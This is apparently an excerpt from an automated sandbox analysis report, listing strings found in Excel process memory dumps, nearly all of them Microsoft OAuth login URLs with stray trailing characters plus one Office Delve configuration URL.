      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCM
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH.
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIG
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJB
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJD
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeL
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeLJ
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMK
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeNP
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOI
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOQ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXQ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY.
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeYF
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_H
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebJ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic=
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelP
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemIe
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenFd
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerM
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesJ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexGj
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeyDi
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~I
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
